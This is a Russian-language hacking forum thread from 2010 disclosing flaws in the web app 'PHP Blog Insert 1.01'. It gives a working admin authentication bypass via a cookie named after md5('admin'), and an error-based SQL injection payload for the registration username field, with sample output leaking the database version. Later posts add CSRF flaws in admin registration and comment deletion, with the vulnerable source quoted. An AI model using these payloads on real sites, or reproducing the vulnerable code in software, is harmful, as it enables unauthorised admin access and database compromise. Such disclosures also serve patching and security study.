Старый 19.09.2010, 08:16   #1
Ctacok
 
Аватар для Ctacok
 
Регистрация: 06.07.2010
Сообщений: 127
Репутация: 49
По умолчанию PHP Blog Insert 1.01

PHP Blog Insert 1.01

Auth bypass.
header.php
PHP код:
 //admin link

$cookie md5('admin');
if(isset(
$_COOKIE[$cookie]))
{
    print 
' | <a href="register.php">Create New Admin</a>';

ну естественно создаём куку с названием 21232f297a57a5a743894a0e4a801fc3, и мы под админом.
Sql inj
нужны права админа ^^
register.php
PHP код:
    if (isset($_POST['submitted'])) //validating the form 
    
{
        include(
'scripts/db_connect_select.php');
        
db_connect_select();        
        
$obj = new user//class validates form and username, and inserts into DB if valid  
        
$obj->username=$_POST['username'];
         
$obj->password=$_POST['password'];
        
$obj->confirm=$_POST['confirm'];    
        
$obj->run();
    }        
        
    else 
    { 
//display the form 
        
add_user_form();                
    } 
//end of submission IF 
Отправимся в файл user_class.php.
PHP код:
    function add_user()
    {
        
$pw md5(trim($this->password));  //trim spaces and encypt password for database entry 
        
$query="INSERT INTO users(username,password) VALUES ('$this->username','$pw')";
        if(
mysql_query($query)) //if query is successful  
        
{    
            print 
'<p>You have successfully registered!</p>';
        }
        else
        {
            print 
'<p class="error">Could not register admin user because:'.'<br />'.mysql_error().'</p>';
            print 
'<p>The query being run was, '.$query.'</p>';
        }            
    } 
1. Создаём любого юзера, с любым пассом.
2. Теперь отправляем в username:
Цитата:
',(SELECT count(*) from information_schema.columns where table_name=1 or 1 group by concat(version(),rand(0)|0)))/*
3. Видим ошибку.
Цитата:
Could not register admin user because:
Duplicate entry '5.0.45-community-nt1' for key 1
__________________
Twitter - @Ctacok
Ctacok вне форума   Ответить с цитированием
Старый 19.09.2010, 10:07   #2
Kernet
 
Регистрация: 06.07.2010
Сообщений: 16
Репутация: 0
По умолчанию

Цитата:
//admin link

$cookie = md5('admin');
if(isset($_COOKIE[$cookie]))
{
print ' | <a href="register.php">Create New Admin</a>';
}
За такое кодерам вообще надо руки обрубать и вешать за йайца на столб
Kernet вне форума   Ответить с цитированием
Старый 19.09.2010, 22:47   #3
life_glider
 
Аватар для life_glider
 
Регистрация: 06.07.2010
Сообщений: 43
Репутация: 17
По умолчанию

тип:CSRF(добавление нового админа-юзера)
файл:register.php
PHP код:
    if (isset($_POST['submitted'])) //validating the form 
    
{
        include(
'scripts/db_connect_select.php');
        
db_connect_select();        
        
$obj = new user//class validates form and username, and inserts into DB if valid  
        
$obj->username=$_POST['username'];
         
$obj->password=$_POST['password'];
        
$obj->confirm=$_POST['confirm'];    
        
$obj->run();
    } 
тип:CSRF(удаление коммента)
файл:delete_comment.php
PHP код:
    elseif (isset($_POST['id']) && is_numeric($_POST['id'])) //if submission is legit, handle the form
    
{
        
//define the query
        
$query="DELETE FROM comments WHERE entry_id={$_POST['id']} LIMIT 1";
        
$r=mysql_query($query); //execute the query 
__________________
Вы все такие классные
life_glider вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot